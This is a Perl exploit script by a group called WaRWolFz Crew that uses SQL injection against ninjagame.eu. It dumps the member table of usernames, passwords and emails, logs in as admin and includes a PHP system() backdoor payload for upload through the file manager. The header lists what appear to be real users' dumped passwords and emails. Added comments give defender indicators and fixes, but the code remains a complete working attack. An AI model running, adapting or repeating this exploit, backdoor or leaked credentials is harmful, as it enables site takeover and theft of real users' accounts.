#!/usr/bin/perl
=Informations
NinjaGame.eu Remote SQL Injection & Dump User Table Exploit By Dante90
Coded By Dante90, WaRWolFz Crew
Bug Discovered By: baser
Web Site: http://www.warwolfz.org/

Bugs and some information:
http://www.ninjagame.eu/sfida_giornaliera1.php?avv=-1 UNION SELECT 1,2,3,4,CONCAT_WS(CHAR(32,58,32),table_name,column_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 FROM information_schema.COLUMNS LIMIT 260,1--
iscritti : id_iscritto
iscritti : username
iscritti : password
iscritti : email

http://www.ninjagame.eu/sfida_giornaliera1.php?avv=-1 UNION SELECT 1,2,3,4,CONCAT_WS(CHAR(32,58,32),id_iscritto,username,password,email),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 FROM iscritti WHERE id_iscritto = 5--
1 : gatsu : cikdavabpi48 : [email protected]
2 : bearwolf : spillaluna : [email protected]
3 : agaa : alessio95x3 : [email protected]
4 : PeppePatti : cheguevara : [email protected]
5 : cri33 : manfro : [email protected]

http://www.ninjagame.eu/migliora_tecniche.php?tipomossa=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 FROM iscritti--&Submit=Filtra

=cut

use strict;
use HTTP::Request::Common;
use LWP::UserAgent;
use HTTP::Cookies;
require HTTP::Headers;
use IO::Socket;

# Positional arguments: an account name and password for the ordinary login,
# and the numeric member id that SQL_Injection() places in its query string.
# With fewer than three arguments the usage banner is printed and the script exits.
my ($UserName,$PassWord,$ID) = @ARGV;
if(@ARGV < 3){
	&usage();
	exit();
}

#START - Define Variables
	# Status text accumulated by Main() and redrawn by Refresh().
	my $Message = "";
	my $Host = "http://www.ninjagame.eu/"; # Base URL that every request in this script is sent to
	# Path and query string naming a PHP file and a `WaRWolFz` GET parameter.
	# Not referenced anywhere else in this listing.
	# Defender note: requests carrying a `WaRWolFz` query parameter are a
	# log indicator worth searching for.
	my $BackDoor = "./inc/languages/english.php?WaRWolFz=php_info();"; #BackDoored File
	# PHP fragment that hands the `WaRWolFz` GET parameter to system().
	# Only Remote_Command_Execution() uses it (as the `new` form field).
	# Defender note: this string inside any PHP file under the web root
	# indicates tampering; file-integrity monitoring would surface it.
	my $Code = "\n\nif(isset(\$_GET['WaRWolFz']))\n\tsystem(\$_GET['WaRWolFz'])"; #Backdoor Code
	# Default Referer value; overwritten by HTTP_Request() when that is called.
	my $Referrer = "http://www.warwolfz.com/";
	# Pre-built GET request for the base URL, used only by HTTP_Request().
	my $Method = HTTP::Request->new(GET => $Host);
	# In-memory cookie jar so the session from the login POST is reused.
	my $Cookies = new HTTP::Cookies;
	# Shared user agent: fixed 'Mozilla/5.0' User-Agent string, redirects not
	# followed, cookies kept in $Cookies.
	my $HTTP = new LWP::UserAgent(
				agent => 'Mozilla/5.0',
				max_redirect => 0,
				cookie_jar => $Cookies,
			) or die $!;
	# Created here but not used by any code visible in this listing.
	my $Headers = HTTP::Headers->new;
#END - Define Variables

sub Clear(){
	# Wipe the terminal with the platform's own command ('cls' on Windows,
	# 'clear' everywhere else) and hand back system()'s status value.
	my $Command = 'clear';
	$Command = 'cls' if $^O eq 'MSWin32';
	return system($Command);
}

# Log in with the account given on the command line.
# Sends a form POST to index.php using the shared $HTTP agent, so any session
# cookie lands in the shared cookie jar.
# Returns 1 when the response body contains "TIMER DEL TUO PERSONAGGIO"
# (case-insensitive), 0 otherwise.
sub Login_UserCP(){
	my $Login = $HTTP->post($Host.'index.php',
				[
					user		=> $UserName,
					pass		=> $PassWord,
					login		=> 'login',
					''			=> 'Login',
				]) || die $!;

	if($Login->content =~ /TIMER DEL TUO PERSONAGGIO/i){
		return 1;
	}else{
		return 0;
	}
}

# Same login POST as Login_UserCP(), but with the credentials passed in as
# arguments (Main() passes the values it parsed out of the injected response).
# Returns 1 when the response body contains "TIMER DEL TUO PERSONAGGIO"
# (case-insensitive), 0 otherwise.
# Defender note: the extracted password is submitted to the login form as-is,
# which presumably only works if the stored column holds the login password
# itself rather than a salted hash; verify how `iscritti.password` is stored.
sub Login_AdminCP{
	my ($UserAdmin,$PassAdmin) = @_;
	my $Login = $HTTP->post($Host.'index.php',
				[
					user		=> $UserAdmin,
					pass		=> $PassAdmin,
					login		=> 'login',
					''			=> 'Login',
				]) || die $!;

	if($Login->content =~ /TIMER DEL TUO PERSONAGGIO/i){
		return 1;
	}else{
		return 0;
	}
}

# Build the relative URL for sfida_giornaliera1.php whose `avv` parameter
# carries a 58-column UNION SELECT against the `iscritti` table, filtered on
# the member id given on the command line ($ID).
# Column 5 is CONCAT_WS(CHAR(32,58,32), ...), i.e. id, username, password and
# email joined by " : " (space, colon, space).
# Defender note: the page's server-side code is not shown here; the fact that
# this works implies `avv` reaches the SQL statement unparameterised. Binding
# it as a parameter (or casting it to an integer) closes this path, and
# `UNION SELECT` / `FROM iscritti` inside `avv` is a usable log signature.
sub SQL_Injection{
	return "./sfida_giornaliera1.php?avv=-1 UNION SELECT 1,2,3,4,CONCAT_WS(CHAR(32,58,32),id_iscritto,username,password,email),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 FROM iscritti WHERE id_iscritto = ${ID}--";
}

# Same URL as SQL_Injection(), but filtered on the member id passed as the
# first argument instead of the global $ID.
# Not called by any code visible in this listing (Main() builds the
# equivalent string inline).
sub Users_Dumping{
	my $ID_Iscritto = shift;
	return "./sfida_giornaliera1.php?avv=-1 UNION SELECT 1,2,3,4,CONCAT_WS(CHAR(32,58,32),id_iscritto,username,password,email),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 FROM iscritti WHERE id_iscritto = ${ID_Iscritto}--";
}

# Same URL shape as SQL_Injection(), with the fixed filter `id_iscritto >= 0`.
# Main() takes the first id it can parse from the response to this URL as the
# upper bound of its per-id request loop.
sub Num{
	return "./sfida_giornaliera1.php?avv=-1 UNION SELECT 1,2,3,4,CONCAT_WS(CHAR(32,58,32),id_iscritto,username,password,email),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 FROM iscritti WHERE id_iscritto >= 0--";
}

# POST the $Code fragment to cp.php?action=filemgr as the new contents of
# index.php under images/ (form fields savefile / pathext / new / save).
# Returns 1 when the response body matches the pattern below, 0 otherwise.
# Not called by Main() or anything else visible in this listing.
# Defender note: an authenticated file-manager endpoint that writes PHP into
# the web root is the sink here; presumably it should be restricted or
# removed, and POSTs to cp.php?action=filemgr are worth alerting on.
sub Remote_Command_Execution(){
	my $Login = $HTTP->post($Host.'cp.php?action=filemgr',
				[
					"savefile"		=> 'index.php',
					"pathext"		=> 'images/',
					"new"			=> $Code,
					"save"			=> 'Conferma le  modifiche'
					#"cancel"		=> 'Cancel or Back'
				]) || die $!;
	if($Login->content =~ /(avatars | common | os_browsers)/i){
		return 1;
	}else{
		return 0;
	}
}

# Set the Referer of the shared $Method request from the first argument
# (overwriting the global $Referrer), send it, and return is_success().
# NOTE(review): declared with an empty prototype yet reads $_[0]; and since
# `or` binds more loosely than `return`, the `die` is never reached.
# Not called by any code visible in this listing.
sub HTTP_Request(){
	$Referrer = $_[0];
	$Method->referrer($Referrer);
	my $Response = $HTTP->request($Method);
	return $Response->is_success() or die "$Host : ", $Response->message,"\n";
}

sub usage{
	# Clear the screen, print the banner with the invocation help, then exit.
	Clear();
	my @Banner = (
		" \n NinjaGame.eu Remote SQL Injection & Dump User Table Exploit By Dante90\n",
		" ------------------------------------------------------ \n",
		" * USAGE:                                             *\n",
		" * cd [Local Disk]:\\[Directory Of Exploit]\\           *\n",
		" * perl name_exploit.pl [username] [password] [id]    *\n",
		" ------------------------------------------------------ \n",
		" *         Powered By Dante90, WaRWolFz Crew          *\n",
		" * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n",
		" ------------------------------------------------------ \n",
	);
	for my $Row (@Banner){
		print $Row;
	}
	exit;
}

sub Refresh{
	# Redraw the screen: banner first, then the site URL (first argument)
	# and the accumulated status text (second argument).
	my ($Site, $Status) = @_;
	Clear();
	print join('',
		" \n NinjaGame.eu Remote SQL Injection & Dump User Table Exploit By Dante90\n",
		" ------------------------------------------------------ \n",
		" * USAGE:                                             *\n",
		" * cd [Local Disk]:\\[Directory Of Exploit]\\           *\n",
		" * perl name_exploit.pl [username] [password] [id]    *\n",
		" ------------------------------------------------------ \n",
		" *         Powered By Dante90, WaRWolFz Crew          *\n",
		" * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n",
		" ------------------------------------------------------ \n",
	);
	print " * Victime Site: " . $Site . "\n";
	print $Status ."\n";
}

sub Failed{
	# Redraw the status screen from the globals $Host and $Message (any
	# arguments passed in are ignored), print the failure footer, and exit.
	Clear();
	Refresh($Host, $Message);
	print " * Exploit Failed                                     *\n",
		" ------------------------------------------------------ \n";
	exit;
}

# Drive the whole run: ordinary login, one injected request to read a single
# member row, a second login with the values read, then one injected request
# per member id whose results are written to a local file.
#
# Defender note: every data-reading step below goes through the `avv` query
# parameter of sfida_giornaliera1.php, so the run shows up in access logs as
# a burst of GETs to that page containing `UNION SELECT` and `FROM iscritti`,
# sent with the fixed User-Agent 'Mozilla/5.0' configured at the top of the
# file. The server-side query is not shown on this page; binding `avv` as a
# parameter (or casting it to an integer) is the presumable fix.
sub Main(){
	Clear();
	my ($AdminUser,$AdminPass);
	#START - Login
	# Stage 1: authenticate with the command-line account; on failure the
	# status screen is shown and Failed() exits.
	if (Login_UserCP() == 1){
		$Message = " * Logged in as: ".$UserName." (UserCP)\n".
					" * Trying to retreive admin level..\n";
	}elsif (Login_UserCP() == 0){
		$Message = " * Login Failed.\n";
		Failed($Host, $Message);
	}
	Refresh($Host, $Message);
	#END - Login
	# Stage 2: request the injected URL for member id $ID and parse an
	# "id : username : password : email" line out of the response body.
	my $Get = $HTTP->get($Host.SQL_Injection());
	if($Get->content =~ /([0-9]{1,10}) : ([a-zA-Z0-9-_.]{2,200}) : ([a-zA-Z0-9-_.]{1,40}) : ([[email protected]]{1,50})/i){
		$AdminUser = $2;
		$AdminPass = $3;
		$Message .= " * ID: ".$1."\n * Admin Username: ".$2."\n * Admin Password: ".$3."\n * E-Mail: ".$4."\n";
	}else{
		$Message .= "n/a\n * Failed.";
		Failed($Host, $Message);
	}
	Refresh($Host, $Message);
	$Message .= " * Done.\n * Trying to login with admin rights..\n";
	Refresh($Host, $Message);
	# Stage 3: log in again with the username/password captured in stage 2.
	if (Login_AdminCP($AdminUser,$AdminPass) == 1){
		$Message .= " * Logged in as: ".$AdminUser." (AdminCP)\n".
					" * Jakpot! You are admin!";
	}elsif (Login_AdminCP($AdminUser,$AdminPass) == 0){
		$Message .= " * Administration Login Failed.";
		Failed($Host, $Message);
	}
	$Message .= "\n * Trying to dumping users table..";
	Refresh($Host, $Message);
	# Stage 4: open the output file in the current directory, then read the
	# first id returned for the `id_iscritto >= 0` query as the loop bound.
	my $Num;
	open (FILE, ">dump_users_ninjagame.eu.html") || die ("");
	$Get = $HTTP->get($Host.Num());
	if($Get->content =~ /([0-9]{1,10}) : ([a-zA-Z0-9-_.]{2,200}) : ([a-zA-Z0-9-_.]{1,40})/i){
		$Num = $1;
	}
	if($Num != ""){
		$Message .= "\n * Dumping..";
	}else{
		$Message .= "\n * Dumping Failed.";
		Failed($Host, $Message);
	}
	Refresh($Host, $Message);
	# One GET per id from 0 to $Num; each parsed "id : username : password"
	# line is appended to $data. This sequential one-request-per-id pattern
	# is what rate limiting or anomaly detection on the endpoint would see.
	my $data = "";
	for(my $I=0; $I<=$Num; $I++){
		$Get = $HTTP->get($Host."./sfida_giornaliera1.php?avv=-1 UNION SELECT 1,2,3,4,CONCAT_WS(CHAR(32,58,32),id_iscritto,username,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 FROM iscritti WHERE id_iscritto = ".$I."--");
		if($Get->content =~ /([0-9]{1,10}) : ([a-zA-Z0-9-_.]{2,200}) : ([a-zA-Z0-9-_.]{1,40})/i){
			$data .= $1." : ".$2." : ".$3."\n";
		}
	}
	# Write everything collected in one go and close the file.
	print FILE $data;
	close (FILE);
	$Message .= "\n * DUMPED.";
	Refresh($Host, $Message);
	print " * Exploit Successfully Executed                      *\n";
	print " ------------------------------------------------------\n ";
	# Runs the shell's `pause` command before exiting.
	system("pause");
	exit;
}

# Entry point: the full sequence runs as soon as the file is executed.
Main();

#WaRWolFz Crew


#WaRWolFz 2010.05.12